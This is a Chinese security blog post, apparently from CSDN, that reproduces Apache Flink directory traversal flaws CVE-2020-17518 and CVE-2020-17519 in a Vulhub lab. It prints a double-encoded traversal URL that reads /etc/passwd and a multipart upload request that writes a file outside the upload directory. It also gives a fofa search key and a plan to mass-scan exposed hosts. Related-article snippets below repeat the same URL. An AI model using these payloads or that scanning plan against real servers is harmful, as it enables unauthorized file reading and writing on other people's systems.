Apache Flink目录遍历漏洞(REST API读/写远程文件)

最新推荐文章于 2024-07-19 14:45:22 发布
最新推荐文章于 2024-07-19 14:45:22 发布
阅读量1.4k 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: apache flink 乌鸦安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdnmmd/article/details/122860476
版权

 微信公众号:乌鸦安全

 

扫取二维码获取更多信息!

CVE-2020-17518复现

0x01 漏洞描述

Apache Flink目录遍历漏洞,可通过REST API读/写远程文件

0x02 影响版本

Flink 1.5.1-1.11.2

0x03 复现过程

  1. 通过Vulhub复现:

下载链接:

https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518

用dcker-cmose配置关环境docker-compose

2. 使用docker-compose配置相关环境docker-compose up -d

3. 运行docker ps查看当前环境

4. 浏览器访问http://127.0.0.1:8081/

5. 构造exp:

http://127.0.0.1:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

6. 清理环境

docker-compose down

0x04 fofa关键字

app="APACHE-Flink"

CVE-2020-17519复现

0x05 构造数据包

复现步骤与18相同,直接构造数据包
 

POST /jars/upload HTTP/1.1
Host: 127001:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187


------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/success"


success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--

返回400

直接访问:

http://127.0.0.1:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fsuccess

0x06 修复建议

直接升级到安全版本 Flink 1.11.3或Flink 1.12.0

0x07 批量脚本编写思路

  1. 先fofa+shodan刷一波,去重

  2. 构造相关exp脚本进行测试即可

  3. 脚本构造很简单,基本没啥难度,在这里就不提供了,太忙了

    主要还是懒

微信公众号:乌鸦安全

 

扫取二维码获取更多信息!

乌鸦安全
关注
专栏目录
[ vulhub漏洞复现篇 ] Apache Flink目录遍历(CVE-2020-17519)
qq_51577576的博客
09-26 3397
[ vulhub漏洞复现篇 ] Apache Flink目录遍历 2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,攻击者可通过REST API使用../跳目录实现系统任意文件取。
记使用flink1.11.3 org/apache/flink/api/common/state/CheckpointListener
biuubi的博客
11-11 2755
Exception in thread “main” java.lang.NoClassDefFoundError: org/apache/flink/api/common/state/CheckpointListener 使用的mysql-cdc的依赖版本太高了,降低版本就好了,真烦死了 <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-ins
apache flink目录遍历漏洞(CVE-2020-17518复现)
ANYOUZHEN的博客
06-04 1328
漏洞描述:apache Flink目录遍历漏洞,可通过REST API/远程文件影响版本:Flink 1.5.1-1.11.2接下来开始复现:我们通过vulhub进行复现打开vulhub上的flink里的cve-2020-17518使用docker-compose配置相关环境:(在靶场cve-2020-17518使用下面的指令) 然后输入kali密码即可成功启动环境接下来我们查看当前环境:在靶场终端输入: 但是在我的kali2022上面出现了报错:8行,和上一篇文章出现了一样的问题,上网搜
Apache Flink目录遍历漏洞
ITgougou_的博客
01-07 328
fofa语法搜索app="Apache-Flink" poc: http://IP:PORT/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 取成功
flink 目录遍历(CVE-2020-17519)
最新发布
qq_23003811的博客
07-19 120
Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口取JobManager本地文件系统上的任何文件
Apache Flink 目录遍历漏洞之脚本收集可访问服务端口
weixin_39664643的博客
01-06 237
CVE-2020-17518/17519:Apache Flink 目录遍历漏洞 实现收集存在flink框架的服务器,并判断是否可访问 # 脚本功能: # 从(主机资产)xxx.json中搜索使用Flink框架的服务器,提取并测试其8081端口是否开启可访问 # import json import requests # flink_list = [] # 存放具有flink的服务器 # valid_flink = [] # 存放可访问的flink # 搜索使用Flink框架的服务器 def s
Apache Flink 目录遍历漏洞 CVE-2020-17519
m0_54323635的博客
08-31 446
2021年01月06日,360CERT监测发现Apache Flink发布了Apache Flink 目录穿越漏洞的风险通告,漏洞编号为CVE-2020-17518,CVE-2020-17519,漏洞等级:高危,漏洞评分:8.5。Apache Flink 1.11.0 中引入的一项更改(也在 1.11.1 和 1.11.2 中发布)允许攻击者通过 JobManager 进程的 REST 接口取 JobManager 本地文件系统上的任何文件
apache目录遍历漏洞利用_Apache Flink目录遍历漏洞
weixin_39836803的博客
01-14 278
CVE-2020-17518CVE-2020-17519今天嗓子有点哑没去上班在家点复现把,这个漏洞有两个编号正确来说是有两种方式,一种是可进行目录遍历,一种是进行远程入,都是通过REST API进行,此漏洞的影响很是广泛,此款框架核心用java和Scala编由于时间有限直接从实战出发未能搭建详细的测试环境一切测试均在真实环境中进行所以并无远程入的详细过程远程取影响版本1.11.0、1....
apache目录遍历漏洞利用_漏洞情报 | Apache Flink 目录遍历漏洞
weixin_36070568的博客
01-14 282
通告信息2021年1月06日,安识科技A-Team团队监测到Apache Flink 发布了目录穿越的漏洞通告,CVE编号为CVE-2020-17518,CVE-2020-17519。Apache Flink是一个开源流处理框架,其核心是用Java和Scala编的分布式流数据流引擎。攻击者利用该漏洞可实现远程取服务器任意文件远程入任意文件,存在极大的安全隐患。安识科技建议广大用户及时升级A...
CVE-2020-17519:Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)
05-30
该脚本为Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)。 使用方法:Python CVE-2020-17519.py urls.txt urls.txt 中每个url为一行,漏洞地址输出在vul.txt中 影响版本: Apache Flink 1.11.0、1.11.1、...
Apache Flink目录遍历(CVE-2020-17519)批量检测脚本
09-24
Apache Flink目录遍历(CVE-2020-17519)批量检测工具 2021年1月5日,Apache Flink官方发布安全更新,...Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,攻击者可通过REST API使用../跳目录实现系统任意文件取。
Apache Flink目录遍历(CVE-2020-17519)单目标检测工具
09-24
Apache Flink目录遍历(CVE-2020-17519)单目标检测工具 2021年1月5日,Apache Flink官方发布安全更新...Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,攻击者可通过REST API使用../跳目录实现系统任意文件取。
Apache Flink jobmanager 目录遍历漏洞
weixin_46801402的博客
11-02 582
Apache Flink jobmanager 目录遍历漏洞
apache目录遍历漏洞利用_【漏洞通告】Apache Flink 目录遍历漏洞(CVE202017518/17519)...
weixin_34511754的博客
01-09 142
Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编的分布式流数据流引擎。 Flink以数据并行和流水线方式执行任意流数据程序,流水线运行时系统可以执行批处理和流处理程序。漏洞简述近日,监测发现Apache Flink发布了Apache Flink 目录穿越漏洞的风险通告,该漏洞编号为CVE-2020-17518...
Apache Flink (文件漏洞/文件漏洞​)CVE-2020-17518/CVE-2020-17519
thelostworld
01-15 408
Apache Flink (文件漏洞/文件漏洞) CVE-2020-17518/17519 一、漏洞描述 Apache Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致目录遍历。 CVE-2020-17518: 文件漏洞 攻击者利用REST API,可以修改HTTP头,将上传的文件入到本地文件系统上的任意位置(Flink 1.5.1进程能访..
Apache Flink -任意文件漏洞(CVE-2020-17518)
chaojixiaojingang
01-07 4143
1.漏洞描述 Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。Apache Flink 1.5.1引入了一个REST处理程序,允许您通过恶意修改的HTTP头将上传的文件入到本地文件系统上的任意位置。 2.影响版本 1.5.1-1.11.2 3.环境搭建 1)漏洞环境在docker中搭建,进入vulhub/flink/CVE-2020-17518目录 docker-compose up-d 2)访问http://192.168.210.227:80...
Apache Flink漏洞(CVE-2020-17519)
小小猪的博客
12-30 1317
Apache Flink漏洞(CVE-2020-17519) 漏洞简介: Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口取JobManager本地文件系统上的任何文件。 影响版本: 1.11.0、1.11.1、1.11.2 环境搭建: 在线环境 地址 漏洞复现: 访问首页 构造poc (url二次编码) /jobmanager/logs/..%252f..%252f..%252f
Apache Flink 文件上传漏洞 (CVE-2020-17518)
qq_50854662的博客
05-22 1267
Apache Flink 文件上传漏洞 (CVE-2020-17518)
Apache Flink任意Jar包上传导致远程代码执行漏洞复现
Heytoo的博客
06-19 695
0x00 简介 Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。 0x01 Flink应用场景 优化电子商务的实时搜索结果:阿里巴巴的所有基础设施团队使用flink实时更新产品细节和库存信息,为用户提供更高的关联性。 针对数据分析团队提供实时流处理服务:flink通过flink-powered数据分析平台提供实时数
Apache Flink CVE-2020-17518:远程文件漏洞分析
"Apache Flink的CVE-2020-17518是一个严重的安全漏洞,它允许远程攻击者通过REST API进行目录遍历,从而实现任意文件入。此漏洞影响Apache Flink的1.5.1至1.11.2版本。攻击者可以通过构造特殊的HTTP请求头来将文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值